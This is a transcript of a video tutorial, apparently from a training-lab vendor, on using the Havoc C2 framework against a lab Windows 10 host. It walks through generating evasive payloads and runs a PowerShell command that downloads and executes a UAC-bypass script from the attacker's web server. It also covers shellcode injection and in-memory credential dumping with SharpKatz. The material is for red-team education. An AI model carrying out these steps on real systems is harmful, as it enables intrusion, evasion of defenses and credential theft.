Hello everyone and welcome back to the CyberRangers YouTube channel. In this video we're going to be continuing off in our C2 framework playlist or series where we'll be essentially taking a look at how to utilize the Havoc C2 framework for red teaming operations. Now, before we get started, as you already know, there's a couple of videos within this series. So if you're new to the series, make sure to take a look at our C2 framework series here on YouTube. That'll essentially introduce you to C2 frameworks, explain how they work, as well as give you examples of some of the other C2 frameworks we've taken a look at. On another note, we will be running a C2 frameworks bootcamp on the 25th of October 2023. If you want to register for that bootcamp to learn more about C2 frameworks, please take a look at the link in the description for more details on how to get access. With that being said, let's get started. So Havoc C2 or the Havoc C2 framework is a relatively new C2 framework when you compare it to some of the other options available, especially the open source options available. So you might be asking yourself, if you haven't heard of Havoc, what exactly is Havoc apart from the fact that it is a C2 framework? Well, to dive a little bit deeper, Havoc is a modern and malleable post-exploitation command and control framework created by C-Spider or C5-Spider, depending on how you want to call it. And it's important to note that Havoc is still in an early state of release or development. And what that means is that changes and updates made to the framework may change how the framework works or may break functionality. The reason this is important, going back to some of the previous videos within this series, is primarily because when you are choosing a C2 framework, one of the parameters that you should have or that you might have is the fact that it remains relatively stable or remains relatively the same in terms of functionality over a period of time, so as to ensure continuity for your red team operations. But with that being said, you can actually find or learn more about the framework and the development roadmap on the GitHub repository. And it's also recommended to refer to the official wiki for more information on functionality and the components that make up the framework. So they have a lot of info on there. Now, in this case, we'll be utilizing a lab on CyberRangers. The lab will be part of the C2 frameworks playlist that you can actually subscribe to. You can get access to this playlist of labs through our upcoming C2 frameworks bootcamp, but I'll be walking you through that process shortly. So to dive a little bit deeper into the release history, as I pointed out, Havoc is still in active development, and as a result, it has not yet been adopted by adversaries for long-term engagements. And so far, Havoc has only two major releases. So we have 0.1 codenamed Star Platinum. That was the first public release of Havoc. And we have 0.2 called or codenamed Magician's Red, which is the second public release of Havoc. So given the project's development cycle and roadmap, it is very important to consider your own C2 requirements and how they can play into the overall stability of Havoc at this point in time. So given the relative newness of Havoc, many AV solutions like Windows Defender have not been able to detect the vanilla payloads or stages. Now, of course, this may change depending on when you watch this video, but this is very common for new C2 frameworks that develop new or that compile new implants or agents. If they are utilizing new techniques or techniques in different ways in terms of generating the payloads, those payloads will in most cases evade detection until the actual antivirus solutions or EDRs update their signature database. So in late October 2022, a lot of AV and EDR solutions began developing signatures to detect the Havoc payloads, but they can still be utilized in a plethora of other ways, like for example, injecting the payloads into an executable, so on and so forth. In terms of the options you have for payload generation, we'll actually take a look at that. But before we do that, installing and building Havoc can be quite cumbersome or complicated at this point in time, but it does work well on Debian 10, 11, Ubuntu 20.04, 22.04, and Kali Linux. And it is recommended to utilize the latest version possible to avoid issues. You'll also need a modern version of Qt and Python 3.10 upwards to avoid build issues. So to alleviate some of these issues, what we have done on CyberRanges is build a lab that already has Havoc installed or configured, so you don't have to go through that process and can essentially dive into it. So Havoc is, another thing to note is that Havoc is not yet a part of any official repository of penetration testing distributions like Kali or Parrot, so you can't install it directly via a via a package within one of the repos. The Havoc project is also actively working on a functional Docker image that will simplify the setup and build of various components that make up the framework. So in time, we will see a Docker image available that can again speed up the setup process. Now, in terms of its features, given the fact that the framework is relatively new, the features are limited, but I would argue that they are very, very useful in the context of Windows red teaming. So firstly, in terms of payload generation, you're limited to exe, shellcode, and DLLs, which is perfectly fine in the case of Windows. You also have HTTP and HTTPS listeners. You have customizable C2 frameworks and external C2 framework support. One really cool feature is you have sleep obfuscation via echo or foliage, which I'll touch on. You also have x64 return address spoofing, indirect syscalls for Windows NT APIs, SMB support, for more peer-to-peer style C2 frameworks or architecture. You also have token vault and a variety of built-in post-exploitation commands, as well as the ability to execute PowerShell code in memory, which is actually fantastic. And the same goes for shellcode. So we'll take a look at all of this. And in my opinion, the user interface of Havoc or the Havoc client is very similar to that of something like Cobalt Strike, which I personally like. So this is a great framework to actually get, to actually try out if you are looking for something along those lines in the context of Windows red teaming. Now, for some important terminology, because as you know, every C2 framework has their own unique terminology, which again is nothing new, but it's very important that you understand what these terms mean. So, generally speaking, globally speaking, the listener is a fairly well-known piece of terminology in the context of C2 frameworks. It essentially, refers to the local process listening for a connection or beacon from a compromised host. Now, we then have the term team server. The team server refers to the actual Havoc C2 server, and then you have the Havoc client, and the client is what you utilize to interact and communicate with the team server. What this means is that Havoc also supports multi-user support, which means if you are part of a large red team, you can all utilize the client to connect to a centralized server and then execute operations that way. You also have modules. So modules are a piece of code executed via the agent to achieve a specific goal. You also have the daemon. This is very important. The daemon is the primary Havoc agent, and it's written in C ASM. And you also have the daemon payload, and currently at this point in time, as I've already gone over, the only supported payload, daemon payloads are x64 exes, DLLs, as well as shellcode. So it's really a Windows C2 framework at this point in time. Functionality may be extended, and that's why it's very important that you actually try it out before adopting it for a red team engagement. As for the listener types, you have your standard HTTP, HTTPS listeners. So they're used to issue tasks through GET requests and can receive data back with POST requests. You also have an SMB listener, which are used to create peer-to-peer communication, C2 communication channels that utilize named pipes to communicate through a parent agent. You also have external C2 listeners, so they support custom agents and external C2 by utilizing the team server service endpoints. In terms of the modules, and you might be thinking to yourself, well, how extensible is this C2 framework? Well, at this point in time, Havoc has a couple of officially supported and integrated modules, one of which is PowerPick, which executes unmanaged PowerShell commands by loading the CLR runtime into the designated fork and run process, which is very useful. You also have invoke assembly. This will execute a .NET assembly into a separate process by bootstrapping the CLR into the designated fork and process and the run process and passing the arguments. You can learn more about the supported payloads on their GitHub repository. In the context of Windows red teaming, you're really going to be working with PowerShell, which Havoc has fantastic support for. So I'm really excited to get started. So now that we can actually get started with a demo, I'm going to switch over to the CyberRangers platform, and we can actually, take a look at how to utilize the C2 Havoc C2 framework for red team operations. So let me switch over into my browser real quick. All right, so I am back within my browser, and I'm currently on the CyberRangers platform. To access the lab, there's two ways you can go about doing it. You can either buy a subscription to the lab or to the playlist of labs titled C2 Frameworks, or alternatively, an easy way to get started with it at a relatively cheap price is the upcoming C2 Frameworks Bootcamp scheduled for the 25th of October. Again, the link to that event is in the description section. But to get started, if you're new to CyberRangers, you can essentially navigate to the URL app.cyberrangers.com, where you'll be prompted to create an account. If you have an account, that's great. If not, registering for one is easy and is free. So you can click on register right over here. You'll then need to provide a unique username and a functional or valid email, because you will receive an activation email that will ask you to confirm, your account, and consequently specify your password. So once you provide a valid email and confirm it, you can go through the terms and conditions and then agree to that if you do agree with the terms and conditions, and then register. You don't need to put in a promo code at all here. That's not required. And once you've registered, you'll receive that activation email that will provide you with a link to which or through which you can specify your password for your account, and you should be good to go. So I already have an account, so I'm just going to log in here. And if you'll see, once you'll be logged in, you'll be taken or directed directly to the CyberRangers dashboard, where you can essentially view the latest scenarios or labs. In the context of the CyberRangers platform, scenarios are individual labs and playlists are a collection of labs. So you can go through the playlists and scenarios available on CyberRangers. Currently, the community section is where you can find free labs. So we have a great selection of free labs that you can get started with at no cost. So they essentially come pre-bundled with your account as free. So you have unlimited access to them. We have a MITRE ATT&CK Defender Adversary Emulation Fundamentals playlist, which contains 7 labs here. Really cool stuff. You also have a collection of 72 boot to root scenarios. So these are CTF challenges that you can go through. You also have a collection of vulnerable web applications as well as CVE labs. We have some really cool vulnerabilities in here, like Log4Shell, Dirty Pipe, and the latest vulnerability on Linux, CVE 2023-22809, which is the sudo edit privilege escalation lab. Now, to get access to the C2 Frameworks playlist of labs, you can navigate into playlists and just search for C2, and it should pop up here. So you can get access to this lab at $150 per month, which will provide you with access to labs on a range of C2 frameworks like Empire, Covenant, Havoc, Sliver, DNSCAT, as well as Mythic, as well as a range of other ones like Nimbo, Atlas, Posh C2. As I said earlier, if you want to get if you want to access these labs for a month, in addition to the bootcamp, please take a look at the link in the description. So in my case, I already have the Havoc lab started up, and the link to the playlist will be in the description section as well. So I'll just go into Havoc here, and this is what a lab looks like on CyberRangers. So the labs are sorted, or the lab page is very easy to understand. You have an overview that will provide you with a walkthrough of the lab and the systems that you can access within the lab. So CyberRangers labs provide you with access to a Kali Linux system. So you'll have access to that. In addition to that, you can also connect to the network, to the lab network, using a VPN if you want to utilize your own pen testing distro. And you have details on the target system as well as credentials that you can utilize there. So the overview provides you with a walkthrough. You also have questions that will assess your knowledge and abilities with regards to the Havoc C2 framework. So this is very important, and they're sorted based on configuration as well as the red team operation side of things here. And you then have the service page, where you'll be essentially provided with a list of systems you can access as part of the lab. So as I said, you have access to the Kali Linux system. You can just click on remote desktop and it'll open up a session within a new browser tab, as you can see here. So because we have two systems via Apache Guacamole, I'll just click on Kali, and you'll have near native performance with the Kali Linux system directly in your browser. How cool is that? So there we are. We can see we're on the Kali Linux system, and we can now get started with Havoc. So you can go through the video demo that I'll be walking you through, or you can go through the scenario mission or walkthrough if you find that works better. All right, so to get started with Havoc, as I said, the lab is already configured or already has Havoc built and configured, so we don't need to go through that phase. So just open up a terminal here, and I'm just going to increase the font size so you can see what I'm doing. We want to navigate into the OPT folder, so let me do that right now. And we then have the Havoc folder in here, so we're going to go into Havoc. And from this point on, let me explain how Havoc is sorted in terms of the file structure. So you can see we have a couple of folders. We have most importantly the client folder and the team server folder. We also have a couple of other important ones. So to begin with, what I want to explore is the profiles, the profiles folder within the team server folder. So I'm going to navigate into team server right over here, and within the team server, we're going to have a couple of binaries, or a couple of, pretty much binaries. So we have the team server binary, which you can execute using sudo team server, and you can then bring up the help menu to get some information about how to utilize or how to start up the team server. I'll be walking you through this. The reason this is important is because the team server requires a profile, a C2 framework profile, to be specified. So if we navigate into the profiles page, you can see that we're going to have two profiles. We're going to have the Havoc YOTL profile, so they're in a YOTL format, and the HTTP SMB profile, which is the one that's been set up. So this will set up HTTP and SMB listeners for you. So these ones are there by default. So if I cat out the contents, you can see it pretty much defines parameters around the functionality of the C2 server or the team server. So you can see that the host is set to the actual IP of the Kali Linux system, and the port it'll listen on is 40,056. The compiler is the standard one, so compiler is x64, as well as the NASM compiler here for generation of payloads, and then the operator credentials or profiles are listed in here. So let me just expand that again. There we go, and you can see that the users you can utilize are Spider and Neo, and the passwords are displayed here. You also have information about the listeners. So the HTTP listener has been configured to bind to the IP address of the Kali Linux system, so we don't need to modify anything there. You can also take a look at the user agent for that, and you then have the actual SMB listener here, which is just called pivot SMB, and the pipe name for SMB is daemon pipe. For the injection, you can see the default parameters are specified here for spawn 64, spawn 32, and the default sleep option has been configured to 2 seconds. So you can modify the profiles to affect how Havoc will work. And in terms of utilizing it or starting up the actual Havoc C2 or team server, it really is very, very simple. So what we need to do at this point is just, say sudo team server. So we run the team server module or binary, if you will, and then we specify the option server, and then we need to specify the profile. So the profile in this case is under the profiles folder, as I showed you, and the name is just http smb.yotl, and we hit enter. That's going to take a couple of seconds. So you can see Havoc Framework version 2, Magician's Red. The profile being used is http smb.yotl. The build options, everything that we saw in the profile, and then it's going to start the listeners. And from this point on, we can now utilize the Havoc GUI client to interact with the team server. So I'm going to open up a new tab here, and we'll just navigate to the same folder. So I'll just zoom in once more, and we'll go into CD OPT and Havoc right over here. And in here, we want to go into the client like so. And within the client, we have the Havoc client binary. So to run it or to get started, we just say Havoc or execute the binary. And from this point on, it's going to bring up the connection prompt, the GUI connection prompt. And what we want to do is click on new profile, and a name for the profile will be set up. It's going to connect to localhost, which is fine. That's where we have the team server running. And make sure you leave the team server tab open within your terminal, because that is required. And from this point on, if you remember the credentials for the user Spider, those are going to be password 1234, and you can then connect. and that's going to bring up the Havoc C2 GUI client, which is absolutely fantastic and reminiscent of Cobalt Strike. So now I'm going to walk you through the user interface, and then we can take a look at an example of how you would utilize Havoc C2 for a Windows red team operation, or a red team operation that's targeting Windows environments. So to kick things off, at the top, you're going to have a toolbar that's very important. So if you click on Havoc, you have the ability to create a new client session or disconnect from the current section or exit. Under View, you'll be able to view your current listeners. So if I click on listeners, you can see we have the two listeners configured in the YOTL profile. So you can see we have the HTTP, HTTPS listener, where you can pretty much remove it, add a new one, or edit it. So if we click on edit, you can see the agent, it's called agent listener HTTP or HTTPS, and the payload is HTTP. It's currently configured to bind to the IP address of the Kali Linux system, and the port it connects to is 443. You can play around with the user agent, as I know that's usually useful, as well as the headers. So obviously try and get rid of Havoc headers right over here, or modify them so that when if your traffic is being monitored or analyzed, it doesn't look too obvious. You can also configure a proxy connection if that works for you, but that's how to view your listeners, as well as remove them or edit them or add a new one. If we take a look at the SMB listener, very, very simple. You just provide the pipe name right over here. That's very useful for Windows environments, especially when you want to set up a peer-to-peer based C2 connection architecture or style. So now that we've taken a look at listeners, under view, you can also change the session view from a table to a graph, which is really cool. I'll actually get to that. Part of the multi-user support provides you with access to a team server chat where you can communicate with your other red team operators. So for example, my username is Spider here, and I can say hello, and if we had other clients, they would be able to communicate with me. So I really like this feature because it's integrated into the client, and multi-user support is always fantastic. You can also close active tabs at the bottom here. So the panes are sorted to essentially, by default, provide you with an event viewer as well as a list of agents. So the agents table has the ID, the internal IP, the username, the computer, the operating system, the process ID, the architecture of the process, and when the agent essentially last connected back or last sent a beacon back. So under view, I can also take a look at loot. So that's information that's exfiltrated from a host or a target, as well as the event viewer and the team server. And you can see the team server just shows you the current state of the Havoc C2 server, where you can essentially use this to diagnose any potential issues on that front. Under attack, you have the ability to generate a payload, which we'll get into. And then you have the scripts, where you can take a look at the script console, as well as the script manager right over here, where you can load scripts in, most likely PowerShell scripts, of course. And then the help provides you with documentation, the API reference, as well as a link to the GitHub repo. So now that we have an understanding of the overall UI, let's get started with an example as to how we can use Havoc for a red team operation. All right, so in order to gain access, what we're going to be trying to do is generate a payload, or a daemon, if you will, and then transfer it over to our target Windows system. We're not going to be utilizing any real red team techniques or tactics or techniques for initial access. We'll just be transferring the payload with a web server, switching over to the Windows machine, downloading it, and then executing it. But to generate the payload, we want to click on Attack and Payload. And the agent is just daemon, and the listener we want to bind it to is the HTTP listener that we have configured. Architecture, it only supports x64 at this point in time. And then the formats, this is where you have the exe format, the DLL format, shellcode, etc. We'll also take a look at shellcode later on. You can then configure the sleep timer here, as well as disable or enable indirect syscalls, which is great for defense evasion. So with this, the agents come with an inbuilt defense evasion tactics or techniques, like the ability to utilize indirect syscalls to avoid calling functions from kernel 32.dll and ntdll.dll. So it also has the ability to utilize two techniques for encrypting the memory region of the process that it's running in to avoid memory scanners when the agent is in sleep mode. So an example of this right over here is if I go into the sleep technique, we have foliage and echo, right? So if you're not familiar with foliage and echo, they're essentially techniques that allow you to encrypt the memory region of the process, essentially making it hard for an EDR, for example, to actually mark it as suspicious. So we'll go with echo in this case, which is very effective. And then the injection technique, native syscall, you can also opt for Win32. And once you're ready to go, you can just click on generate, and it's going to compile the Windows exe payload for you. And in this case, the agent is just daemon. So as you can see, compiling source. I'm going to give it a few seconds to maybe a minute to finalize. All right, so once it's done, it's going to prompt you for it's going to prompt you to provide a location as to where you want it saved. I'm going to save it in my downloads folder. That'll become apparent because there's a couple of scripts we have here, some PowerShell scripts as well as seatbelt and sharpcats that we'll be using for this demo. So I'll save it in there as daemon.exe. And now that we have that generated, we now need to transfer it over to the Windows system. So in order to do this, I'm going to set up a web server here using Python on the Kali Linux system to host that file or those files within the downloads folder. So I'll navigate into downloads, and in here we'll just say sudo python3 module is http.server, and we'll run it on port 8080, and it'll host all of these files that we'll require. So now I'll switch back over to the lab page, and under the Windows 10 system, which is the target system, we can also get RDP access to that system within our browser. So within Guacamole, we'll just click on Windows 10 and you should be signed in. So this system is running Windows 10, which is great for this demo. And now I'll just download the daemon payload that we generated. So I'll just utilize PowerShell, and I'll navigate, actually let me increase the font size here so you can see this. So on the font, just increase this to something like 28. So I'll navigate to the desktop, and from this point on, I can say, or I can utilize something like invoke web request, and then say, URI is going to be the IP address of the Kali Linux system, which is going to be static. So in this case, it's 192.168.125.55, and then the port is port 8080, and Windows is bugging us with updates as usual. There we are, so 8080, and then the name is daemon.exe, as we know, as we saved it as, and then the out file is going to be daemon.exe, and we can then hit enter, and it's going to save it on the desktop. And then from this point on, we can pretty much execute it. So I'm just going to say daemon.exe from within PowerShell. And if we switch back over into the Kali Linux system and into the Havoc client, we should see the callback from the actual agent in a few seconds. So depending on the sleep timer, there we are, we can actually see it. So in this pane, you're going to see the actual agents being displayed. You can change the view to a graph, which is more reminiscent of Cobalt Strike, where you can essentially view the C2 server represented by this icon and all of the agents calling back, all of the hosts calling back in here. If I'll go back into the table view, where you can see the ID of the agent, its internal IP, the user we currently have access to, the computer name or the host name, the operating system, as well as the process ID, the architecture, and when it was last seen. So if the sleep time is set to 2 seconds, it'll ping back every 2 seconds. Obviously, that's something you can modify. So to interact with it, you can right click on it and you have a couple of options. So you can export it, mark it as dead, remove, or terminate the connection through the thread or process option there. So under interact, that'll bring up an interactive shell session, which will open up in the bottom pane right over here. So I'll just drag this in here, and there's a couple of things that you need to be aware of. So firstly, Havoc provides you with a really cool set of inbuilt modules or commands that you can invoke or you can learn more about by typing in the help option. And you can see that we have a couple of daemon commands like sleep, check-in, job, task, directory, your standard file system navigation tools, as well as a PowerShell option. So for example, I can run the inbuilt command who am I, like so, and that's going to display additional information. So that's not the native Windows command. If I wanted to run a shell command on the Windows system, I can just say shell who am I, and that'll run the actual who am I command. And you can see it's going to task the daemon to execute the shell command, and the output will be displayed here. So you can see that's what you would expect from the native Windows command. You can also learn more about an inbuilt command by typing in help and then the name of the command, like who am I, and you can see it's going to say the usage is fairly simple. This is going to get all the info from who am I all without starting cmd.exe. So that's one of the great things about Havoc, is defense evasion is built into it in terms of command options that you get natively. So a very useful command is obviously the check-in command here. So if I just type it in, check in, this will allow us to view, it's going to send a check-in request. So there we are, check-in request. We get information about the agent, so the agent ID, the first call in terms of the timestamp, as well as the cryptographic key information, so the AES key, and then the sleep delay, and just information about the agent. We can also right-click on an agent here and you navigate or explore the process list or the file explorer. So if we're going to the process list, it's going to open up a new tab, and look at how fantastic this is. So we have essentially a complete list of the process tree, starting from process ID 0 and so on and so forth. So we can take a look at processes and interact with them by right-clicking on them and copying the process ID. We can also refresh the process tree right over here. As I said, you also have the ability to utilize the File Explorer module, which, as it says, will allow you to browse the file system of the actual on the actual agent or the target host. So File Explorer, in here you can see we're currently within the desktop, but we can specify a path, for example, C users in here, and I'll hit enter, and that's going to bring up that directory. We can then navigate by going into, let's say, admin, and in this particular case, if we hit enter, I don't think that'll work directly, but we can say C in here, and we can just say users and admin, like so. If that doesn't work, you can specify the native path here as you would within Windows, and make sure to specify all the correct folder or file names. And if I hit enter now, that'll bring up the admin user directory, and we can then navigate. So if you want to exfiltrate a file, you can right click on it, and you can also create a folder. You can reload or remove a file, but for example, if we right click, if we actually go into C, let me say users, and then let me type that in correctly. So users, and then we say admin in here, and I go into the desktop, you'll see it'll bring up the desktop. And then from this point on, we have the ability to exfiltrate and download through the shell session, which I'll touch on. But you can also remove it, create a directory, or reload the file system. So really, really cool stuff here. So what we can do is, if we go into the shell session, we can actually, try and, for example, take a screenshot of the desktop. And the reason why I'm showing you this is because right over here, you can view what you have exfiltrated by going into view and clicking on loot. And here you'll see the screenshot that we just took, which is exactly how we left it on the Windows system with the PowerShell session still running, which is pretty cool. You can also filter by the type of information or data exfiltrated, so screenshots or downloads. And that's a really, really cool tip, or something that I find really, really useful. So now let's take a look at, some, typical things you do after exploitation or initial access with Havoc. So an example of something that we can do is, of course, run the shell system, the Windows system info command to learn more about the target. So just standard local enumeration, and the output will be displayed, as you know, within this window. So here we can learn more about the target operating system. We can also, perform enumeration about the user. So for example, in here we can say, shell net user, and we can just say, for example, to learn more about the admin user, we can say shellnet user admin, and we'll give that a few seconds. So it's going to send the task, and there we are. So we now know that this user is part of the administrators, the local administrators group on Windows. So that means if I say shell who am I, and I say priv here, Let's see whether we have elevated privileges or whether we'll need to, bypass UAC. So in this case, we can see that while the admin user is part of the local administrators group, we currently don't have a privileged session. So let's take a look at that as an example as to how we can elevate our privileges. So one thing that we can do is, if we go back to the process tree, and I want to show you some shellcode generation and injection, we can actually try and inject shellcode into a process, right? So in order to do that, what we want to do is, let's go ahead and we're going to go into attack payload, and we're going to generate shellcode. So Windows shellcode, and in here we'll again select the sleep technique as echo, and we're going to say generate, and that's going to generate shellcode in the form of a binary file, or bin file if you will, not binary but bin. And we'll give it a couple of seconds. It's then going to prompt you to specify a location as to where you want to save the bin file. So it's going to compile everything, and that'll take a couple of seconds, which we will happily give. And I'm going to save it under the downloads directory, so just as daemon.bin. And now that it's done, we can actually go into the process tree, and for example, we had created a PowerShell process here. Let me see if I can identify it. So we'll just try and find it somewhere here. Let's see. Can we find PowerShell.exe anywhere here? All right, so there we are. We have PowerShell, and now I can copy the process ID. And if I wanted to inject that shellcode to give us another session, again, just showing you how this can be useful. Again, you can generate whatever shellcode you want and then inject it into a process dynamically. We can essentially go back into the shell here and say shellcode. So I'm just going to type that in. So shellcode inject. And we can then say x64, because it is x64 shellcode, and then the process ID, which we copied. So I'll paste that in there, which is 6328 of the PowerShell process, or any process for that matter. And then the directory to the shellcode. So home range admin is the name of the user on the Kali Linux system. Under downloads, we have daemon.bin. All right, so I'll hit enter, and that's going to execute the shellcode into the remote process, and we should get another check-in from the same target system. Now, as I said, you can inject whatever shellcode you want that does whatever you want. This just shows how this will work. So you can see that the shellcode was injected successfully, and indeed we get another callback from the same system, but now through the PowerShell process. How cool is that? Now, if we wanted to elevate our privileges, if you remember, we had set up a web server in the downloads directory that contained a bypass UAC PowerShell script. We can actually try and, I'll show you how to execute PowerShell scripts with Havoc here. So it really is very, very simple. So we firstly need to get the agent to download it from our web server, the actual script. So we'll say PowerShell, and you can execute PowerShell commands natively this way. So we can say PowerShell IEX, IWR, and then we can say USEB, and then HTTP, the IP address of the Kali Linux system where the web server is running, .55, and then we can say port 8080, and the name of the file is going to be, as we know, bypass UAC, and it is bypass UAC.ps1, so PowerShell, and then we can just close the brackets and hit enter. So this will tell the agent to essentially download the script and then execute it, and we should get a callback based on what the script does, which I'll actually show you. So this is a modified bypass UAC script that we developed to essentially bypass UAC and then connect back to our listener here. So in this particular case, it will bypass UAC and then execute the daemon.exe payload that we transferred onto the Windows system, which is why I saved it on the desktop. So you can modify this script to execute whatever executable you want or payload that you want, even a interpreter payload, as long as you specify the path where it is saved and you ensure that that payload has already been transferred. So not really an intricate script by any means, but we can just hit enter here. And it's going to send the task to the agent. And there we are. We received an output, and we should get a callback if everything was successful. If not, we'll take a look at the command to see whether we had any errors, but we should get an elevated or a privileged callback, which indeed we do. So the best way to visualize this is to go into view and then into the graph view. And in here now, let me just drag this pane to the bottom, and you can now see that we have two standard non-privileged sessions on the actual system or the host, these two here running on different processes. And then we have a privileged session, so it has a similar iconography to that of Cobalt Strike, where the elevated session will have an icon that's highlighted in red that's surrounded by electricity or something like that. And in this case, we now have an elevated session. So we can now right click on it and interact with it. And if I now say, you know, for example, who am I? We can just say shell because we want to run who am I priv. We should now have elevated an elevated session. So we'll wait for the results. And as you can see here, we have all the privileges you would associate with an elevated session. Now, the final technique that I want to show you is how we can essentially execute inline, how we can utilize the .NET command and perform inline execution to run an executable, right? So in this case, we'll be running sharpcats, which is under the desktop of the Kali Linux system. So we can utilize something called .NET and then inline execute to execute the executable inline or in memory, and we specify the path to that executable. So in this case, it's down home range admin downloads, and the name is sharpcats.exe. So this executable is already present in the downloads folder, and will just allow us to dump credentials, proving that we elevated our privileges. So we can now say logon passwords. So we'll just say logon password. So this is a modified version of Mimikatz. We'll just hit enter, and if everything is successful, let's see, looks like we have a bit of an issue. So .NET inline execute, home range admin downloads, sharpcats.exe, logon passwords. Let's see, do we have any error here? So we have it on the downloads, and it's just sharpcats.exe. Let's see here. I think I made a spelling mistake with .NET. That is my bad. So that's not .NET, but rather .NET. There we are. And that should execute that exe inline or in memory. So there we are. We can see that sharpcats executes successfully, and we should be able to get some hashes here. So we'll give it a couple of seconds, and the results will be displayed back. We actually get the NTLM hash of the admin user, which you can then try and crack, although the clear text password is already displayed here on the lab page. So that brings us to the end of the practical session of this video, and to the end of the video as a whole. And that is how to utilize Havoc C2 framework for red team operations. So definitely give it a go. And with that being said, thank you very much for watching this video. If you enjoyed this video, please leave a like down below and subscribe to the CyberRangers YouTube channel for more. If you found this video useful, please share it on your social networks on LinkedIn and Twitter. That'll help us a lot. If you want to gain access to this lab and other C2 framework labs, please take a look at our upcoming bootcamp. It's a 3-day bootcamp starting on the 25th of October. That'll provide you with access to the actual training and the C2 frameworks playlist on CyberRangers for 30 days, all at an incredibly cheap price. So definitely check that out. The link to that is in the description section. With that being said, thank you very much for watching, and I'll be seeing you in the next video.